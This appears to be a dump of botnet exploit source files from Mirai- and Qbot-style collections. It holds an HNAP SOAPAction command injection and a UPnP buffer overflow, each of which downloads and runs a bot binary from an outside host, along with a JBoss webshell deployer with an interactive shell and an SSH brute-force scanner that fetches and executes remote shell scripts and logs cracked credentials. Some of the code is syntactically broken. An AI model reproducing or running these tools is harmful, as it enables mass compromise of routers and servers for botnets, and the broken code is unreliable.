SPLOITS/HNAP UPNP/hnap.py
#! python !#
import threading, sys, time, random, socket, re, os, requests
from Queue import *
from sys import stdout
from threading import Thread
ips = open(sys.argv[1], "r").readlines()
queue = Queue()
queue_count = 0
payload = "<?xml version=\"1.0\" encoding=\"utf-8\"?><soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\"><soap:Body><AddPortMapping xmlns=\"http://purenetworks.com/HNAP1/\"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>"
headerlist = {'SOAPAction': 'http://purenetworks.com/HNAP1/GetDeviceSettings/`cd /tmp; busybox wget http://1.1.1.1/bins/mips; chmod 777 mips; ./mips hnap.exploit`'}
def hnap(host):
try:
print "Loading " + self.ip
url = "http://" + self.ip + /HNAP1"
requests.post(url, timeout=5, headers=headerlist, data=payload)
except:
pass
return
def main():
global queue_count
for line in ips:
line = line.strip("\r")
line = line.strip("\n")
queue_count += 1
sys.stdout.write("\r[%d] Added to queue" % (queue_count))
sys.stdout.flush()
queue.put(line)
sys.stdout.write("\n")
i = 0
while i != queue_count:
i += 1
try:
input = queue.get()
thread = Thread(target=hnap, args=(input,))
thread.start()
except KeyboardInterrupt:
sys.exit("Interrupted? (ctrl + c)")
thread.join()
return
if __name__ == "__main__":
main()
```
#### File: MIRAI SPLOITS/IPMI/load_ipmi.py
```python
SPLOITS/IPMI/load_ipmi.py
#! python !#
import threading, sys, time, random, socket, re, os, struct, array, requests
buffer = "\"" + "A"*140 + "\x8c\xdd\x0a\x40" + "A"*139 + "\x78\xfe\xff\xff" + "A"*16 + "\xf8\xda\x09\x40" + "A"*8 + "\xac\xb0\x0d\x40\x68\x55\x0a\x40" + "A"*108 + "sleep 1;busybox wget https://i.imger.me/8c393eaa9.gif;exit;#" + "A"*1307 + "\""
ips = open(sys.argv[1], "r").readlines()
commandpayload = "M-SEARCH * HTTP/1.1\r\nHost:172.16.17.32:1900\r\nST:uuid:schemas:device:" + buffer + ":end\r\nMan:\"ssdp:discover\"\r\nMX:3\r\n\r\n"
class netis(threading.Thread):
def __init__ (self, ip):
threading.Thread.__init__(self)
self.ip = str(ip).rstrip('\n')
def run(self):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
print "Attempting %s"%(self.ip)
s.sendto(commandpayload, (self.ip, 1900))
time.sleep(1)
except Exception:
pass
for ip in ips:
try:
n = netis(ip)
n.start()
time.sleep(0.01)
except:
pass
```
#### File: MIRAI SPLOITS/JBOSS FULL/jexboss_vulnscanner.py
```python
# Updates: https://github.com/joaomatosf/jexboss
# Free for distribution and modification, but the authorship should be preserved.
import httplib, sys, urllib, os, time
from urllib import urlencode
RED = '\x1b[91m'
RED1 = '\033[31m'
BLUE = '\033[94m'
GREEN = '\033[32m'
BOLD = '\033[1m'
NORMAL = '\033[0m'
ENDC = '\033[0m'
def getHost(url):
tokens = url.split("://")
if len(tokens) == 2: #foi fornecido protocolo
return tokens[1].split(":")[0]
else:
return tokens.split(":")[0]
def getProtocol(url):
tokens = url.split("://")
if tokens[0] == "https":
return "https"
else:
return "http"
def getPort(url):
token = url[6:].split(":")
if len(token) == 2:
return token[1]
elif getProtocol(url) == "https":
return 443
else:
return 80
def getConnection(url):
if getProtocol(url) == "https":
return httplib.HTTPSConnection(getHost(url), getPort(url))
else:
return httplib.HTTPConnection(getHost(url), getPort(url))
def getSuccessfully(url, path):
result = 404
time.sleep(5)
conn = getConnection(url)
conn.request("GET", path)
result = conn.getresponse().status
if result == 404:
conn.close()
time.sleep(7)
conn = getConnection(url)
conn.request("GET", path)
result = conn.getresponse().status
conn.close()
return result
def checkVul(url):
print ( GREEN +" ** Checking Host: %s **\n" %url )
path = { "jmx-console" : "/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo",
"web-console" : "/web-console/ServerInfo.jsp",
"JMXInvokerServlet" : "/invoker/JMXInvokerServlet"}
for i in path.keys():
try:
print GREEN + " * Checking %s: \t" %i + ENDC,
conn = getConnection(url)
conn.request("HEAD", path[i])
path[i] = conn.getresponse().status
if path[i] == 200 or path[i] == 500:
print RED + "[ VULNERABLE ]" + ENDC
else: print GREEN + "[ OK ]"
conn.close()
except:
print RED + "\n * An error ocurred while contaction the host %s\n" %url + ENDC
path[i] = 505
return path
def autoExploit(url, type):
# exploitJmxConsoleFileRepository: tested and working in jboss 4 and 5
# exploitJmxConsoleMainDeploy: tested and working in jboss 4 and 6
# exploitWebConsoleInvoker: tested and working in jboss 4
# exploitJMXInvokerFileRepository: tested and working in jboss 4 and 5
print GREEN + ("\n * Sending exploit code to %s. Wait...\n" %url)
result = 505
if type == "jmx-console":
result = exploitJmxConsoleFileRepository(url)
if result != 200 and result != 500:
result = exploitJmxConsoleMainDeploy(url)
elif type == "web-console":
result = exploitWebConsoleInvoker(url)
elif type == "JMXInvokerServlet":
result = exploitJMXInvokerFileRepository(url)
if result == 200 or result == 500:
print GREEN + " * Successfully deployed code! Starting command shell, wait...\n" + ENDC
shell_http(url, type)
else:
print (RED + "\n * Could not exploit the flaw automatically. Exploitation requires manual analysis...\n"
" Waiting for 7 seconds...\n "+ ENDC)
time.sleep(7)
def shell_http(url, type):
if type == "jmx-console" or type == "web-console":
path = '/jbossass/jbossass.jsp?'
elif type == "JMXInvokerServlet":
path = '/shellinvoker/shellinvoker.jsp?'
conn = getConnection(url)
conn.request("GET", path)
conn.close()
time.sleep(7)
resp = ""
#clear()
print " * - - - - - - - - - - - - - - - - - - - - LOL - - - - - - - - - - - - - - - - - - - - * \n"
print RED+" * "+url+": \n"+ENDC
headers = {"User-Agent" : "jexboss"}
for cmd in ['uname -a', 'cat /etc/issue', 'id']:
conn = getConnection(url)
cmd = urlencode({"ppp": cmd})
conn.request("GET", path+cmd, '', headers)
resp += " "+conn.getresponse().read().split(">")[1]
print resp,
while 1:
print BLUE + "[Type commands or \"exit\" to finish]"
cmd=raw_input("Shell> "+ENDC)
#print ENDC
if cmd == "exit":
break
conn = getConnection(url)
cmd = urlencode({"ppp": cmd})
conn.request("GET", path+cmd, '', headers)
resp = conn.getresponse()
if resp.status == 404:
print RED+ " * Error contacting the commando shell. Try again later..."
conn.close()
continue
stdout = ""
try:
stdout = resp.read().split("pre>")[1]
except:
print RED+ " * Error contacting the commando shell. Try again later..."
if stdout.count("An exception occurred processing JSP page") == 1:
print RED + " * Error executing command \"%s\". " %cmd.split("=")[1] + ENDC
else: print stdout,
conn.close()
def exploitJmxConsoleMainDeploy(url):
# MainDeployer
# does not work in jboss5 (bug in jboss5)
# shell in link
# /jmx-console/HtmlAdaptor
jsp = "http://www.joaomatosf.com/rnp/jbossass.war"
payload =( "/jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.system:service"
"=MainDeployer&methodIndex=19&arg0="+jsp)
print ( GREEN+ "\n * Info: This exploit will force the server to deploy the webshell "
"\n available on: "+jsp +ENDC)
conn = getConnection(url)
conn.request("HEAD", payload)
result = conn.getresponse().status
conn.close()
return getSuccessfully(url, "/jbossass/jbossass.jsp")
def exploitJmxConsoleFileRepository(url):
# DeploymentFileRepository
# tested and work in jboss4, 5.
# doest not work in jboss6
# shell jsp
# /jmx-console/HtmlAdaptor
jsp =("%3C%25%40%20%70%61%67%65%20%69%6D%70%6F%72%74%3D%22%6A%61%76%61"
"%2E%75%74%69%6C%2E%2A%2C%6A%61%76%61%2E%69%6F%2E%2A%22%25%3E%3C"
"%70%72%65%3E%3C%25%20%69%66%20%28%72%65%71%75%65%73%74%2E%67%65"
"%74%50%61%72%61%6D%65%74%65%72%28%22%70%70%70%22%29%20%21%3D%20"
"%6E%75%6C%6C%20%26%26%20%72%65%71%75%65%73%74%2E%67%65%74%48%65"
"%61%64%65%72%28%22%75%73%65%72%2D%61%67%65%6E%74%22%29%2E%65%71"
"%75%61%6C%73%28%22%6A%65%78%62%6F%73%73%22%29%29%20%7B%20%50%72"
"%6F%63%65%73%73%20%70%20%3D%20%52%75%6E%74%69%6D%65%2E%67%65%74"
"%52%75%6E%74%69%6D%65%28%29%2E%65%78%65%63%28%72%65%71%75%65%73"
"%74%2E%67%65%74%50%61%72%61%6D%65%74%65%72%28%22%70%70%70%22%29"
"%29%3B%20%44%61%74%61%49%6E%70%75%74%53%74%72%65%61%6D%20%64%69"
"%73%20%3D%20%6E%65%77%20%44%61%74%61%49%6E%70%75%74%53%74%72%65"
"%61%6D%28%70%2E%67%65%74%49%6E%70%75%74%53%74%72%65%61%6D%28%29"
"%29%3B%20%53%74%72%69%6E%67%20%64%69%73%72%20%3D%20%64%69%73%2E"
"%72%65%61%64%4C%69%6E%65%28%29%3B%20%77%68%69%6C%65%20%28%20%64"
"%69%73%72%20%21%3D%20%6E%75%6C%6C%20%29%20%7B%20%6F%75%74%2E%70"
"%72%69%6E%74%6C%6E%28%64%69%73%72%29%3B%20%64%69%73%72%20%3D%20"
"%64%69%73%2E%72%65%61%64%4C%69%6E%65%28%29%3B%20%7D%20%7D%25%3E" )
payload =("/jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin:service="
"DeploymentFileRepository&methodName=store&argType=java.lang.String&arg0="
"jbossass.war&argType=java.lang.String&arg1=jbossass&argType=java.lang.St"
"ring&arg2=.jsp&argType=java.lang.String&arg3="+jsp+"&argType=boolean&arg4=True")
conn = getConnection(url)
conn.request("HEAD", payload)
result = conn.getresponse().status
conn.close()
return getSuccessfully(url, "/jbossass/jbossass.jsp")
def exploitJMXInvokerFileRepository(url):
# tested and work in jboss4, 5
# MainDeploy, shell in data
# /invoker/JMXInvokerServlet
payload = ( "\xac\xed\x00\x05\x73\x72\x00\x29\x6f\x72\x67\x2e\x6a\x62\x6f\x73"
"\x73\x2e\x69\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x2e\x4d\x61\x72"
"\x73\x68\x61\x6c\x6c\x65\x64\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f"
"\x6e\xf6\x06\x95\x27\x41\x3e\xa4\xbe\x0c\x00\x00\x78\x70\x70\x77"
"\x08\x78\x94\x98\x47\xc1\xd0\x53\x87\x73\x72\x00\x11\x6a\x61\x76"
"\x61\x2e\x6c\x61\x6e\x67\x2e\x49\x6e\x74\x65\x67\x65\x72\x12\xe2"
"\xa0\xa4\xf7\x81\x87\x38\x02\x00\x01\x49\x00\x05\x76\x61\x6c\x75"
"\x65\x78\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4e"
"\x75\x6d\x62\x65\x72\x86\xac\x95\x1d\x0b\x94\xe0\x8b\x02\x00\x00"
"\x78\x70\xe3\x2c\x60\xe6\x73\x72\x00\x24\x6f\x72\x67\x2e\x6a\x62"
"\x6f\x73\x73\x2e\x69\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x2e\x4d"
"\x61\x72\x73\x68\x61\x6c\x6c\x65\x64\x56\x61\x6c\x75\x65\xea\xcc"
"\xe0\xd1\xf4\x4a\xd0\x99\x0c\x00\x00\x78\x70\x7a\x00\x00\x02\xc6"
"\x00\x00\x02\xbe\xac\xed\x00\x05\x75\x72\x00\x13\x5b\x4c\x6a\x61"
"\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x3b\x90"
"\xce\x58\x9f\x10\x73\x29\x6c\x02\x00\x00\x78\x70\x00\x00\x00\x04"
"\x73\x72\x00\x1b\x6a\x61\x76\x61\x78\x2e\x6d\x61\x6e\x61\x67\x65"
"\x6d\x65\x6e\x74\x2e\x4f\x62\x6a\x65\x63\x74\x4e\x61\x6d\x65\x0f"
"\x03\xa7\x1b\xeb\x6d\x15\xcf\x03\x00\x00\x78\x70\x74\x00\x2c\x6a"
"\x62\x6f\x73\x73\x2e\x61\x64\x6d\x69\x6e\x3a\x73\x65\x72\x76\x69"
"\x63\x65\x3d\x44\x65\x70\x6c\x6f\x79\x6d\x65\x6e\x74\x46\x69\x6c"
"\x65\x52\x65\x70\x6f\x73\x69\x74\x6f\x72\x79\x78\x74\x00\x05\x73"
"\x74\x6f\x72\x65\x75\x71\x00\x7e\x00\x00\x00\x00\x00\x05\x74\x00"
"\x10\x73\x68\x65\x6c\x6c\x69\x6e\x76\x6f\x6b\x65\x72\x2e\x77\x61"
"\x72\x74\x00\x0c\x73\x68\x65\x6c\x6c\x69\x6e\x76\x6f\x6b\x65\x72"
"\x74\x00\x04\x2e\x6a\x73\x70\x74\x01\x79\x3c\x25\x40\x20\x70\x61"
"\x67\x65\x20\x69\x6d\x70\x6f\x72\x74\x3d\x22\x6a\x61\x76\x61\x2e"
"\x75\x74\x69\x6c\x2e\x2a\x2c\x6a\x61\x76\x61\x2e\x69\x6f\x2e\x2a"
"\x22\x25\x3e\x3c\x70\x72\x65\x3e\x3c\x25\x69\x66\x28\x72\x65\x71"
"\x75\x65\x73\x74\x2e\x67\x65\x74\x50\x61\x72\x61\x6d\x65\x74\x65"
"\x72\x28\x22\x70\x70\x70\x22\x29\x20\x21\x3d\x20\x6e\x75\x6c\x6c"
"\x20\x26\x26\x20\x72\x65\x71\x75\x65\x73\x74\x2e\x67\x65\x74\x48"
"\x65\x61\x64\x65\x72\x28\x22\x75\x73\x65\x72\x2d\x61\x67\x65\x6e"
"\x74\x22\x29\x2e\x65\x71\x75\x61\x6c\x73\x28\x22\x6a\x65\x78\x62"
"\x6f\x73\x73\x22\x29\x20\x29\x20\x7b\x20\x50\x72\x6f\x63\x65\x73"
"\x73\x20\x70\x20\x3d\x20\x52\x75\x6e\x74\x69\x6d\x65\x2e\x67\x65"
"\x74\x52\x75\x6e\x74\x69\x6d\x65\x28\x29\x2e\x65\x78\x65\x63\x28"
"\x72\x65\x71\x75\x65\x73\x74\x2e\x67\x65\x74\x50\x61\x72\x61\x6d"
"\x65\x74\x65\x72\x28\x22\x70\x70\x70\x22\x29\x29\x3b\x20\x44\x61"
"\x74\x61\x49\x6e\x70\x75\x74\x53\x74\x72\x65\x61\x6d\x20\x64\x69"
"\x73\x20\x3d\x20\x6e\x65\x77\x20\x44\x61\x74\x61\x49\x6e\x70\x75"
"\x74\x53\x74\x72\x65\x61\x6d\x28\x70\x2e\x67\x65\x74\x49\x6e\x70"
"\x75\x74\x53\x74\x72\x65\x61\x6d\x28\x29\x29\x3b\x20\x53\x74\x72"
"\x69\x6e\x67\x20\x64\x69\x73\x72\x20\x3d\x20\x64\x69\x73\x2e\x72"
"\x65\x61\x64\x4c\x69\x6e\x65\x28\x29\x3b\x20\x77\x68\x69\x6c\x65"
"\x20\x28\x20\x64\x69\x73\x72\x20\x21\x3d\x20\x6e\x75\x6c\x6c\x20"
"\x29\x20\x7b\x20\x6f\x75\x74\x2e\x70\x72\x69\x6e\x74\x6c\x6e\x28"
"\x64\x69\x73\x72\x29\x3b\x20\x64\x69\x73\x72\x20\x3d\x20\x64\x69"
"\x73\x2e\x72\x65\x61\x64\x4c\x69\x6e\x65\x28\x29\x3b\x20\x7d\x20"
"\x7d\x25\x3e\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67"
"\x2e\x42\x6f\x6f\x6c\x65\x61\x6e\xcd\x20\x72\x80\xd5\x9c\xfa\xee"
"\x02\x00\x01\x5a\x00\x05\x76\x61\x6c\x75\x65\x78\x70\x01\x75\x72"
"\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74"
"\x72\x69\x6e\x67\x3b\xad\xd2\x56\xe7\xe9\x1d\x7b\x47\x02\x00\x00"
"\x78\x70\x00\x00\x00\x05\x74\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61"
"\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x71\x00\x7e\x00\x0f\x71\x00"
"\x7e\x00\x0f\x71\x00\x7e\x00\x0f\x74\x00\x07\x62\x6f\x6f\x6c\x65"
"\x61\x6e\x63\x79\xb8\x87\x78\x77\x08\x00\x00\x00\x00\x00\x00\x00"
"\x01\x73\x72\x00\x22\x6f\x72\x67\x2e\x6a\x62\x6f\x73\x73\x2e\x69"
"\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x2e\x49\x6e\x76\x6f\x63\x61"
"\x74\x69\x6f\x6e\x4b\x65\x79\xb8\xfb\x72\x84\xd7\x93\x85\xf9\x02"
"\x00\x01\x49\x00\x07\x6f\x72\x64\x69\x6e\x61\x6c\x78\x70\x00\x00"
"\x00\x04\x70\x78")
conn = getConnection(url)
headers = { "Content-Type" : "application/x-java-serialized-object; class=org.jboss.invocation.MarshalledValue",
"Accept" : "text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2"}
conn.request("POST", "/invoker/JMXInvokerServlet", payload, headers)
response = conn.getresponse()
result = response.status
if result == 401:
print " Retrying..."
conn.close()
conn.request("HEAD", "/invoker/JMXInvokerServlet", payload, headers)
response = conn.getresponse()
result = response.status
if response.read().count("Failed") > 0:
result = 505
conn.close
return getSuccessfully(url, "/shellinvoker/shellinvoker.jsp")
def exploitWebConsoleInvoker(url):
# does not work in jboss5 (bug in jboss5)
# MainDeploy, shell in link
# /web-console/Invoker
#jsp = "http://www.joaomatosf.com/rnp/jbossass.war"
#jsp = "\\x".join("{:02x}".format(ord(c)) for c in jsp)
#jsp = "\\x" + jsp
payload = ( "\xac\xed\x00\x05\x73\x72\x00\x2e\x6f\x72\x67\x2e"
"\x6a\x62\x6f\x73\x73\x2e\x63\x6f\x6e\x73\x6f\x6c\x65\x2e\x72\x65"
"\x6d\x6f\x74\x65\x2e\x52\x65\x6d\x6f\x74\x65\x4d\x42\x65\x61\x6e"
"\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\xe0\x4f\xa3\x7a\x74\xae"
"\x8d\xfa\x02\x00\x04\x4c\x00\x0a\x61\x63\x74\x69\x6f\x6e\x4e\x61"
"\x6d\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f"
"\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x06\x70\x61\x72\x61\x6d\x73"
"\x74\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f"
"\x62\x6a\x65\x63\x74\x3b\x5b\x00\x09\x73\x69\x67\x6e\x61\x74\x75"
"\x72\x65\x74\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67"
"\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x10\x74\x61\x72\x67\x65"
"\x74\x4f\x62\x6a\x65\x63\x74\x4e\x61\x6d\x65\x74\x00\x1d\x4c\x6a"
"\x61\x76\x61\x78\x2f\x6d\x61\x6e\x61\x67\x65\x6d\x65\x6e\x74\x2f"
"\x4f\x62\x6a\x65\x63\x74\x4e\x61\x6d\x65\x3b\x78\x70\x74\x00\x06"
"\x64\x65\x70\x6c\x6f\x79\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61"
"\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x3b\x90\xce\x58"
"\x9f\x10\x73\x29\x6c\x02\x00\x00\x78\x70\x00\x00\x00\x01\x74\x00"
"\x2a"
#link
"\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x6a\x6f\x61\x6f\x6d\x61"
"\x74\x6f\x73\x66\x2e\x63\x6f\x6d\x2f\x72\x6e\x70\x2f\x6a\x62\x6f"
"\x73\x73\x61\x73\x73\x2e\x77\x61\x72"
#end
"\x75\x72\x00\x13\x5b"
"\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e"
"\x67\x3b\xad\xd2\x56\xe7\xe9\x1d\x7b\x47\x02\x00\x00\x78\x70\x00"
"\x00\x00\x01\x74\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e"
"\x53\x74\x72\x69\x6e\x67\x73\x72\x00\x1b\x6a\x61\x76\x61\x78\x2e"
"\x6d\x61\x6e\x61\x67\x65\x6d\x65\x6e\x74\x2e\x4f\x62\x6a\x65\x63"
"\x74\x4e\x61\x6d\x65\x0f\x03\xa7\x1b\xeb\x6d\x15\xcf\x03\x00\x00"
"\x78\x70\x74\x00\x21\x6a\x62\x6f\x73\x73\x2e\x73\x79\x73\x74\x65"
"\x6d\x3a\x73\x65\x72\x76\x69\x63\x65\x3d\x4d\x61\x69\x6e\x44\x65"
"\x70\x6c\x6f\x79\x65\x72\x78")
conn = getConnection(url)
headers = { "Content-Type" : "application/x-java-serialized-object; class=org.jboss.console.remote.RemoteMBeanInvocation",
"Accept" : "text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2"}
conn.request("POST", "/web-console/Invoker", payload, headers)
response = conn.getresponse()
result = response.status
if result == 401:
print " Retrying..."
conn.close()
conn.request("HEAD", "/web-console/Invoker", payload, headers)
response = conn.getresponse()
result = response.status
conn.close
return getSuccessfully(url, "/jbossass/jbossass.jsp")
def clear():
if os.name == 'posix':
os.system('clear')
elif os.name == ('ce', 'nt', 'dos'):
os.system('cls')
def checkArgs(args):
if len(args) < 2 or args[1].count('.') < 1:
return 1,"You must provide the host name or IP address you want to test."
elif len(args[1].split('://')) == 1:
return 2, 'Changing address "%s" to "http://%s"' %(args[1], args[1])
elif args[1].count('http') == 1 and args[1].count('.') > 1:
return 0, ""
else:
return 1, 'Parâmetro inválido'
def banner():
clear()
print (RED1+"\n * --- JexBoss: Jboss verify and EXploitation Tool --- *\n"
" | |\n"
" | @author: <NAME> |\n"
" | @contact: <EMAIL> |\n"
" | |\n"
" | @update: https://github.com/joaomatosf/jexboss |\n"
" #______________________________________________________#\n\n" )
banner()
# check python version
if sys.version_info[0] == 3:
print (RED + "\n * Not compatible with version 3 of python.\n"
" Please run it with version 2.7 or lower.\n\n"
+BLUE+" * Example:\n"
" python2.7 " + sys.argv[0]+ " https://site.com\n\n"+ENDC )
sys.exit(1)
# check Args
status, message = checkArgs(sys.argv)
if status == 0:
url = sys.argv[1]
elif status == 1:
print RED + "\n * Error: %s" %message
print BLUE + "\n Example:\n python %s https://site.com.br\n" %sys.argv[0] + ENDC
sys.exit(status)
elif status == 2:
url = ''.join(['http://',sys.argv[1]])
# check vulnerabilities
mapResult = checkVul(url)
# performs exploitation
for i in ["jmx-console", "web-console", "JMXInvokerServlet"]:
if mapResult[i] == 200 or mapResult[i] == 500:
print BLUE + ("\n\n * Do you want to try to run an automated exploitation via \""+BOLD+i+NORMAL+"\" ?\n"
" This operation will provide a simple command shell to execute commands on the server..\n"
+RED+" Continue only if you have permission!" +ENDC)
if raw_input(" yes/NO ? ").lower() == "yes":
autoExploit(url, i)
# resume results
if mapResult.values().count(200) > 0:
banner()
print RED+ " Results: potentially compromised server!" +ENDC
print (GREEN+" * - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -*\n\n"
" Recommendations: \n"
" - Remove web consoles and services that are not used, eg:\n"
" $ rm web-console.war\n"
" $ rm http-invoker.sar\n"
" $ rm jmx-console.war\n"
" $ rm jmx-invoker-adaptor-server.sar\n"
" $ rm admin-console.war\n"
" - Use a reverse proxy (eg. nginx, apache, f5)\n"
" - Limit access to the server only via reverse proxy (eg. DROP INPUT POLICY)\n"
" - Search vestiges of exploitation within the directories \"deploy\" or \"management\".\n\n"
" References:\n"
" [1] - https://developer.jboss.org/wiki/SecureTheJmxConsole\n"
" [2] - https://issues.jboss.org/secure/attachment/12313982/jboss-securejmx.pdf\n"
"\n"
" - If possible, discard this server!\n\n"
" * - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -*\n" )
elif mapResult.values().count(505) == 0:
print ( GREEN+ "\n\n * Results: \n"
" The server is not vulnerable to bugs tested ... :D\n\n" + ENDC)
# infos
print (ENDC+" * Info: review, suggestions, updates, etc: \n"
" https://github.com/joaomatosf/jexboss\n"
" <EMAIL>\n")
print ENDC
```
#### File: MIRAI SPLOITS/MIKROTIK SSH LOADER/Mikload.py
```python
import threading, paramiko, random, socket, time, sys
paramiko.util.log_to_file("/dev/null")
blacklisted = ["127.0","10.0","192.168"] #You can these out add or whatever u want lol
#server_ip = useless atm
passwords = ["<PASSWORD>"]
if sys.argv[4] == "root":
passwords = ["<PASSWORD>"]
if sys.argv[4] == "guest":
passwords = ["<PASSWORD>"]
if sys.argv[4] == "telnet":
passwords = ["<PASSWORD>"]
if len(sys.argv) < 4:
sys.exit("Usage: python " + sys.argv[0] + " <threads> <start-range> <end-range> <passwords>")
print """\n\x1b[0;37m******************************
* \x1b[0;31mSCANNER STARTING\x1b[0;37m *
******************************\x1b[0m"""
def sshscanner(ip):
global passwords
try:
thisipisbad='no'
for badip in blacklisted:
if badip in ip:
thisipisbad='yes'
if thisipisbad=='yes':
sys.exit()
username='root'
password="0"
port = 22
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(3)
s.connect((ip, port))
data = str(s.recv(1024))
if "SSH" in data:
print("\x1b[1;35mInvalid \x1b[1;33m-- \x1b[1;35m" + ip + "\x1b[37m")
elif "ssh" in data:
print("\x1b[1;35mInvalid \x1b[1;33m-- \x1b[1;35m" + ip + "\x1b[37m")
else:
sys.exit()
s.close()
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
dobreak=False
for passwd in passwords:
if ":n/a" in passwd:
password=""
else:
password=passwd.split(":")[1]
if "n/a:" in passwd:
username=""
else:
username=passwd.split(":")[0]
try:
ssh.connect(ip, port = port, username=username, password=password, timeout=3)
break
except:
pass
badserver=True
stdin, stdout, stderr = ssh.exec_command("/sbin/ifconfig")
output = stdout.read()
if "inet addr" in output:
badserver=False
websites = [ ]
if badserver == False:
print("\x1b[1;37mAttempting Mikrotik \x1b[1;33m-- \x1b[1;35m" + ip + ":" + username + ":" + password + "\<PASSWORD>")
ssh.exec_command("cd /tmp; echo ''>DIRTEST || cd /var; echo ''>DIRTEST; wget http://172.16.58.325/8UsA.sh; curl -O http://104.248.251.125/8UsA.sh; chmod 777 8UsA.sh; sh 8UsA.sh; tftp 172.16.17.32 -c get t8UsA.sh; chmod 777 t8UsA.sh; sh t8UsA.sh; tftp -r t8UsA2.sh -g 172.16.17.32; chmod 777 t8UsA2.sh; sh t8UsA2.sh; rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh")
vulns = open("Mikrotik.txt", "a").write(username + ":" + password + ":" + ip + "\n") #This is not needed u can take it out if u want
time.sleep(12)
ssh.close()
except Exception as e:
pass
if sys.argv[2] == "KOWAI":
ranges = ["188.16.000.000/172.16.31.10/192.168.3.11/172.16.31.10/"]
randomrange = random.choice(ranges)
startrng = randomrange.split("/")[0]
endrng = randomrange.split("/")[1]
if sys.argv[2] != "KOWAI":
a = int(sys.argv[2].split(".")[0])
b = int(sys.argv[2].split(".")[1])
c = int(sys.argv[2].split(".")[2])
d = int(sys.argv[2].split(".")[3])
else:
a = int(startrng.split(".")[0])
b = int(startrng.split(".")[1])
c = int(startrng.split(".")[2])
d = int(startrng.split(".")[3])
x = 0
while(True):
try:
if sys.argv[2] != "KOWAI":
endaddr = sys.argv[3]
else:
endaddr = endrng
d += 1
ipaddr = str(a) + "." + str(b) + "."+str(c)+"."+str(d)
if endaddr == (ipaddr or str(a) + "." + str(b) + "."+str(c)+"."+str(d-1)):
if sys.argv[2] == "KOWAI":
randomrange = random.choice(ranges)
startrng = randomrange.split("/")[0]
endrng = randomrange.split("/")[1]
a = int(startrng.split(".")[0])
b = int(startrng.split(".")[1])
c = int(startrng.split(".")[2])
d = int(startrng.split(".")[3])
else:
break
if d > 255:
c += 1
d = 0
if c > 255:
b += 1
c = 0
if b > 255:
a += 1
b = 0
ipaddr = str(a) + "." + str(b) + "."+str(c)+"."+str(d)
if ipaddr == endaddr:
if sys.argv[2] == "KOWAI":
randomrange = random.choice(ranges)
startrng = randomrange.split("/")[0]
endrng = randomrange.split("/")[1]
a = int(startrng.split(".")[0])
b = int(startrng.split(".")[1])
c = int(startrng.split(".")[2])
d = int(startrng.split(".")[3])
else:
break
if x > 500:
time.sleep(1)
x = 0
t = threading.Thread(target=sshscanner, args=(ipaddr,))
t.start()
except Exception as e:
pass
print "\x1b[37mDone\x1b[37m"
```
#### File: Qbot/auto setup/Darkraii AutoSetup.py
```python
import subprocess
def cri(cmd):
subprocess.call(cmd, shell=True)
def replace_line(file_name, line_num, text):
lines = open(file_name, 'r').readlines()
lines[line_num] = text
out = open(file_name, 'w')
out.writelines(lines)
out.close()
print'\x1b[34m DDDDDDD AAAAAAAA RRRRRR KK K RRRRRR AAAAAAAA I '
print'\x1b[34mDDDDDDDDD AAAAAAAAAA RRRRRRRR KKK KK RRRRRRRR AAAAAAAAAA II '
print'\x1b[34mDDD `DDD AAA AAA RRR RRR KKK KKK RRR RRR AAA AAA III '
print'\x1b[34mDDD DDD AAA AAA RRR RRR KKK KKK RRR RRR AAA AAA III '
print'\x1b[34mDDD DDD AAAAAAAAAA RRR RRR KKK KKK RRR RRR AAAAAAAAAA III '
print'\x1b[34mDDD DDD AAAAAAAAAA RRR RRRR KKKKKKKKKK RRR RRRR AAAAAAAAAA III '
print'\x1b[34mDDD DDD AAA AAA RRRRRRRRR KKKKKKKKK RRRRRRRRR AAA AAA III '
print'\x1b[34mDDD DDD AAA AAA RRRR RRRR KKK KKK RRRR RRRR AAA AAA III '
